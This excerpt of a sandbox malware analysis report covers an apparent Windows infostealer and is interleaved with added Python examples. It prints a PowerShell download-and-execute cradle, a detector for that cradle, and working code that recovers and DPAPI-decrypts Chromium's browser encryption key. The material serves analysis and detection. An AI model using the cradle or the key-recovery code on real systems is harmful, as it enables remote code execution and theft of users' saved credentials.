                                                        • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                        • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                        • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                        APIs
                                                        • lstrcat.KERNEL32(?,0064A30C), ref: 00B34A42
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B34A68
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34A87
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34A9B
                                                        • lstrcat.KERNEL32(?,0064A284), ref: 00B34AAE
                                                        • lstrcat.KERNEL32(?,?), ref: 00B34AC2
                                                        • lstrcat.KERNEL32(?,0064A2C8), ref: 00B34AD6
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B38FF7: GetFileAttributesA.KERNEL32(00000000,?,00B21DBB,?,?,0042565C,?,?,00420E1F), ref: 00B39006
                                                          • Part of subcall function 00B347D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B347E7
                                                          • Part of subcall function 00B347D7: RtlAllocateHeap.NTDLL(00000000), ref: 00B347EE
                                                          • Part of subcall function 00B347D7: wsprintfA.USER32 ref: 00B3480D
                                                          • Part of subcall function 00B347D7: FindFirstFileA.KERNEL32(?,?), ref: 00B34824
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                        • String ID:
                                                        • API String ID: 2540262943-0
                                                        • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                        • Instruction ID: 0288467fb9b0023c4540ab8645a502d1f5e059ce3caf46df32290cb2a6cd1844
                                                        • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                        • Instruction Fuzzy Hash: 3C31A2F6940308ABCB10FBF0CC86EE973B8AB58700F4045C9B24592081EEB09789CF96
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                        Strings
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                        • <, xrefs: 00412D39
                                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                        • ')", xrefs: 00412CB3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        • API String ID: 3031569214-898575020
                                                        • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                        • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                        • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                        • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
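Added example, not from the report or the sample. The listing above builds the command line `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"` from three fixed fragments plus a URL (the URL is not on the page) and launches it with ShellExecuteEx. The Python below is the matching detection: it takes Sysmon-style process-creation records (constructed here; the URL, the parent path and the field names are assumptions for the demo) and flags only command lines that pair DownloadString with iex/Invoke-Expression, so a plain fetch into a variable does not fire; the SysWOW64 path is recorded as a separate indicator because it means the launching process is itself 32-bit.

```python
import re

# Markers from the strings the routine concatenates; matched case-insensitively
# because PowerShell itself is case-insensitive ("IEX", "Iex" all work).
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"""DownloadString\(\s*['"]([^'"]+)['"]\s*\)""", re.IGNORECASE)
NOPROFILE_RE = re.compile(r"(?:^|\s)-nop\w*\b", re.IGNORECASE)  # -nop, -nopro, -NoProfile all parse


def is_powershell(image):
    """True for Windows PowerShell or PowerShell 7 regardless of path or case."""
    return image.lower().replace("/", "\\").endswith(("\\powershell.exe", "\\pwsh.exe"))


def classify_event(event):
    """Return a finding for a process-creation event that matches the
    DownloadString + iex cradle, or None. Both halves are required: a fetch
    alone (DownloadString into a variable) is common in admin scripts."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    if not is_powershell(image):
        return None
    fetch = DOWNLOAD_RE.search(cmd)
    if fetch is None or IEX_RE.search(cmd) is None:
        return None
    indicators = ["DownloadString", "iex"]
    if NOPROFILE_RE.search(cmd):
        indicators.append("-nop")              # -NoProfile skips profile scripts, where some environments hook logging
    if "\\syswow64\\" in image.lower():
        indicators.append("wow64-powershell")  # 32-bit PowerShell: the launching process is 32-bit too
    return {
        "rule": "powershell-downloadstring-iex",
        "url": fetch.group(1),
        "parent": event.get("ParentImage", ""),
        "indicators": indicators,
    }


def scan_events(events):
    """Apply classify_event to a batch and keep the hits."""
    return [f for f in (classify_event(e) for e in events) if f is not None]


# Constructed Sysmon-style event records for the demo. The URL and the parent
# path are placeholders, not values from the report.
SAMPLE_EVENTS = [
    {   # the cradle exactly as the listing assembles it, with a placeholder URL
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"''',
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe",
    },
    {   # benign: a scheduled script run, no fetch, no iex
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # fetch without execute: would be noisy if flagged, so it is not
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": r'''pwsh -c "$v = (New-Object Net.WebClient).DownloadString('http://example.invalid/version.txt'); Write-Output $v"''',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The extracted URL is the pivot for the rest of the investigation (proxy logs, the fetched script itself); keeping it in the finding rather than only in the raw command line saves the analyst a second parse.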
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B214A5
                                                        • __aulldiv.LIBCMT ref: 00B214BF
                                                        • __aulldiv.LIBCMT ref: 00B214CD
                                                        • ExitProcess.KERNEL32 ref: 00B214FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3404098578-2766056989
                                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction ID: 40566be62d501f234bf72210eac55144bbcefc7ecd06d87ee6fe446329dcbee3
                                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction Fuzzy Hash: EB016DB0940308BAEF10EBD4EC89B9DBBB8EB14705F208888F709772C0D7B49641CB55
                                                        APIs
                                                        • memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B30CC7: memset.MSVCRT ref: 00B30E83
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                          • Part of subcall function 00B30CC7: lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • memcmp.MSVCRT(?,00421114,00000003), ref: 00B2A116
                                                        • memset.MSVCRT ref: 00B2A14F
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00B2A1A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                        • String ID: @
                                                        • API String ID: 1977917189-2766056989
                                                        • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                        • Instruction ID: 70cc57d805e77b624b8f0d3460353a01fee02c65de3672a35114cf7d5cc08481
                                                        • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                        • Instruction Fuzzy Hash: BE616971A00258EBCB18EFA4DD86FED77B1AF55300F608158F90AAB191DB746A05CB42
                                                        APIs
                                                        • strtok_s.MSVCRT ref: 00410DB8
                                                        • strtok_s.MSVCRT ref: 00410EFD
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: strtok_s$lstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 348468850-0
                                                        • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                        • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                        • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                        • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                          • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                          • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                          • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                        • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                          • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                          • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                          • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                          • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                        • String ID: $"encrypted_key":"$DPAPI
                                                        • API String ID: 3731072634-738592651
                                                        • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                        • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                        • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                        • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
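Added example, not from the report or the sample. The call sequence above (StrStrA for `"encrypted_key":"`, CryptStringToBinaryA with dwFlags 1 for base64, memcmp against `DPAPI` over 5 bytes, then CryptUnprotectData) is the standard recovery of the key in a Chromium Local State file; the report itself does not name the browser. The Python below re-implements the format handling so it can be exercised offline on a constructed document (the blob inside is a DPAPI header with zero padding, not a real key); the CryptUnprotectData step is kept in its own Windows-only function via ctypes and is not called on the constructed input. The five-byte memcmp also encodes a limitation worth knowing when reproducing the behaviour: a key stored with any other prefix is rejected, because the routine only knows how to unwrap the DPAPI form.

```python
import base64
import ctypes
import json
import sys

DPAPI_PREFIX = b"DPAPI"                     # the five bytes the routine memcmp()s
# Every DPAPI blob opens with dwVersion = 1 and the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian field order.
DPAPI_BLOB_HEADER = b"\x01\x00\x00\x00" + bytes.fromhex("d08c9ddf0115d1118c7a00c04fc297eb")


class LocalStateError(ValueError):
    """The document has no usable DPAPI-wrapped key."""


def extract_encrypted_key(local_state_text):
    """Find os_crypt.encrypted_key, base64-decode it, check and strip the
    DPAPI prefix, and return the blob that CryptUnprotectData expects.
    A JSON parse is tried first; the routine's own substring search
    ("encrypted_key":") is the fallback for a truncated or partial dump."""
    try:
        key_b64 = json.loads(local_state_text)["os_crypt"]["encrypted_key"]
    except (ValueError, KeyError, TypeError):
        marker = '"encrypted_key":"'
        start = local_state_text.find(marker)
        if start == -1:
            raise LocalStateError("no encrypted_key field")
        start += len(marker)
        key_b64 = local_state_text[start:local_state_text.index('"', start)]
    try:
        decoded = base64.b64decode(key_b64, validate=True)
    except ValueError as exc:
        raise LocalStateError("encrypted_key is not valid base64") from exc
    if not decoded.startswith(DPAPI_PREFIX):
        raise LocalStateError("unexpected key prefix %r" % decoded[:5])
    return decoded[len(DPAPI_PREFIX):]


def looks_like_dpapi_blob(blob):
    """Cheap structural check before calling into DPAPI."""
    return blob.startswith(DPAPI_BLOB_HEADER)


def dpapi_unprotect(blob):
    """CryptUnprotectData wrapper (Windows only, must run as the same user
    that owns the profile). Returns the raw key material."""
    if sys.platform != "win32":
        raise OSError("DPAPI is only available on Windows")

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", ctypes.c_uint32), ("pbData", ctypes.POINTER(ctypes.c_char))]

    buf = ctypes.create_string_buffer(blob, len(blob))
    inp = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    out = DATA_BLOB()
    if not ctypes.windll.crypt32.CryptUnprotectData(
            ctypes.byref(inp), None, None, None, None, 0, ctypes.byref(out)):
        raise ctypes.WinError()
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(out.pbData)   # the output buffer is LocalAlloc'd by DPAPI


def describe(local_state_text):
    """Triage helper: run the extraction and report the outcome without raising."""
    try:
        blob = extract_encrypted_key(local_state_text)
    except LocalStateError as exc:
        return {"status": "rejected", "reason": str(exc)}
    return {"status": "ok", "blob_len": len(blob), "dpapi_header": looks_like_dpapi_blob(blob)}


# Constructed inputs. FAKE_BLOB is only the DPAPI header plus zero padding, so
# it parses but cannot be unprotected; it is not a real key.
FAKE_BLOB = DPAPI_BLOB_HEADER + b"\x00" * 28
SAMPLE_LOCAL_STATE = json.dumps({
    "os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + FAKE_BLOB).decode()},
    "profile": {"last_used": "Default"},
})
# A partial dump where only the field survives, as a substring search would see it.
TRUNCATED_LOCAL_STATE = '..."encrypted_key":"' + base64.b64encode(DPAPI_PREFIX + FAKE_BLOB).decode() + '"}'
# Same shape but a made-up prefix: the five-byte memcmp must reject it.
OTHER_PREFIX_LOCAL_STATE = json.dumps({
    "os_crypt": {"encrypted_key": base64.b64encode(b"XXXXX" + FAKE_BLOB).decode()},
})

if __name__ == "__main__":
    for name, doc in [("sample", SAMPLE_LOCAL_STATE), ("truncated", TRUNCATED_LOCAL_STATE),
                      ("other-prefix", OTHER_PREFIX_LOCAL_STATE)]:
        print(name, describe(doc))
```

On a live Windows host the last step is `dpapi_unprotect(extract_encrypted_key(open(path).read()))`; the structural check in `looks_like_dpapi_blob` is there so a corrupted or foreign blob is caught before the DPAPI call rather than surfacing as an opaque Win32 error.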
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CodeInfoPageValidmemset
                                                        • String ID:
                                                        • API String ID: 703783727-0
                                                        • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                        • Instruction ID: 411a268c5bda43b313181ea0141e543248734a02c545bd386f71ff57211387d5
                                                        • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                        • Instruction Fuzzy Hash: 2031F830A042A59ED7259FB4CC952B9BFE0DB06310F3841FAE881EF192C738D809D761
                                                        APIs
                                                        • GetSystemTime.KERNEL32(?), ref: 00B36BD3
                                                        • sscanf.NTDLL ref: 00B36C00
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B36C19
                                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00B36C27
                                                        • ExitProcess.KERNEL32 ref: 00B36C41
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$System$File$ExitProcesssscanf
                                                        • String ID:
                                                        • API String ID: 2533653975-0
                                                        • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                        • Instruction ID: 7206272370c2f970c20583bd4ae74c7a979d349ceb4ac5e6dbc4f41b0a7d7a73
                                                        • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                        • Instruction Fuzzy Hash: 4121E7B6D04208ABCF08EFE4D949AEEB7F6FF48300F14956EE406A3250EB345604CB65
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                        • RegOpenKeyExA.ADVAPI32(80000002,00824830,00000000,00020119,?), ref: 00417E5E
                                                        • RegQueryValueExA.ADVAPI32(?,0082AA90,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                        • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3466090806-0
                                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3809E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B380A5
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 00B380C5
                                                        • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 00B380E6
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B380F9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction ID: c039a328161d870b130696709a3c52fdd7c3a9074821852c381e5d94d20fadd4
                                                        • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                        • Instruction Fuzzy Hash: 1E114FB5A84209FFD714CFD4DD4AFBBB7B9EB09710F104159F615A7280CB7558018BA2
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3799B
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B379A2
                                                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00B37920), ref: 00B379C2
                                                        • RegQueryValueExA.ADVAPI32(00B37920,00420AAC,00000000,00000000,?,000000FF), ref: 00B379E1
                                                        • RegCloseKey.ADVAPI32(00B37920), ref: 00B379EB
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3225020163-0
                                                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction ID: 872055278fb266b8c97bbe3fdef9ba263c3d36a0c6c4f07e8214d70ae15b883b
                                                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                        • Instruction Fuzzy Hash: 3601F4B9A80308BFEB10DFE4DC4AFAEB7B9EB44701F104559FA05A7281DA7555008F51
                                                        APIs
                                                        • StrStrA.SHLWAPI(00829FD8,?,?,?,0041140C,?,00829FD8,00000000), ref: 0041926C
                                                        • lstrcpyn.KERNEL32(0064AB88,00829FD8,00829FD8,?,0041140C,?,00829FD8), ref: 00419290
                                                        • lstrlenA.KERNEL32(?,?,0041140C,?,00829FD8), ref: 004192A7
                                                        • wsprintfA.USER32 ref: 004192C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpynlstrlenwsprintf
                                                        • String ID: %s%s
                                                        • API String ID: 1206339513-3252725368
                                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
